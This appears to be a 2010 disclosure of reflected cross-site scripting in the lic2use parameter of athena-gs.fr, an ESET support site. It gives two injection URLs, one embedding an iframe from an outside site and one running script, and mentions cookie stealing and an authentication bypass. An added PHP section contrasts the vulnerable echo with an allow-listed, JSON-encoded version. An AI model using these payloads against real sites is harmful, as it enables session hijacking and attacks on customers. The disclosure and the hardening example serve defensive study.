Athena-gs.fr suffers from cross site scripting vulnerabilities.
+-----------------------------------------------------------+
| Stupid XSS + "Auth ByPass" athena-gs.fr |
+-----------------------------------------------------------+
| Author : FlUxIuS from Slashon and HandGrep |
| Date : 14/06/2010 |
+-----------------------------------------------------------+
Introduction
=============
Athena Global Services provides support for ESET Antivirus software in France.
In this exploit, I would just like to show how simple it is to use this vulnerability against customers, after bypassing
the authentication page by a Magic research ^_^'... (Cookies Stealing and Session hijacking for example).
The exploit
===========
[Iframe] : https://www.athena-gs.fr/dexter/reg_keys/index.php?lic2use=%3C/script%3E%3Ciframe%20width=%22100%%22%20height=%22300px%22%20src=%22http://www.bonjourinfirmiere.fr/post/695159180/proposee-par-zedacen%22%3E%3C/iframe%3E
[Javascript] : index.php?lic2use=999%22;%20alert(%22huhu%22);%20theDoc.Register_Key.value=%22488
and so on...
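
The two payloads above close either the surrounding JavaScript string or the whole script element, which means lic2use is echoed into the page without encoding. The following is an added example, not code from athena-gs.fr or from the advisory's author: it shows that reflection pattern beside a hardened form. It assumes the value lands in a double-quoted string assigned to theDoc.Register_Key.value inside an inline script, and that a licence id is a short run of digits; the function names are hypothetical.

```php
<?php
// Added example, not the site's code. Assumption: lic2use is echoed into an
// inline <script> as a double-quoted string assigned to
// theDoc.Register_Key.value (the shape the second payload implies).

const JS_SAFE = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;

// Vulnerable pattern (hypothetical reconstruction): raw concatenation.
function render_vulnerable(string $lic): string
{
    return '<script>theDoc.Register_Key.value="' . $lic . '";</script>';
}

// Encoding for a JS string inside HTML: json_encode emits a quoted literal,
// and the JSON_HEX_* flags turn < > & ' " into \uXXXX escapes, so neither the
// string nor the <script> element can be closed by the value.
function js_string(string $value): string
{
    return json_encode($value, JS_SAFE | JSON_THROW_ON_ERROR);
}

// Hardened: allow-list first, then encode for the output context.
function render_hardened(string $lic): string
{
    // Assumption: a licence id is 1-10 digits (the page uses 999 and 488).
    if (!preg_match('/\A[0-9]{1,10}\z/', $lic)) {
        $lic = ''; // reject anything else instead of trying to clean it
    }
    return '<script>theDoc.Register_Key.value=' . js_string($lic) . ';</script>';
}

$samples = [
    '488',                                                  // expected form
    '999"; alert("huhu"); theDoc.Register_Key.value="488',  // decoded from the page
    '</script><iframe src="https://example.invalid/"></iframe>', // constructed, shortened
];

foreach ($samples as $s) {
    echo "input:      ", $s, "\n";
    echo "vulnerable: ", render_vulnerable($s), "\n";
    echo "hardened:   ", render_hardened($s), "\n";
    echo "encoded:    ", js_string($s), "\n\n";
}
```

The "encoded" line shows what js_string() alone produces for fields that cannot be allow-listed. Marking the session cookie HttpOnly additionally keeps it out of reach of injected script, which addresses the cookie stealing mentioned in the introduction.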
Credits
=======
(fr) http://www.slashon.com/index.php/2010-06-14/crackmefr_athena_global_episode1_la_menace_fantome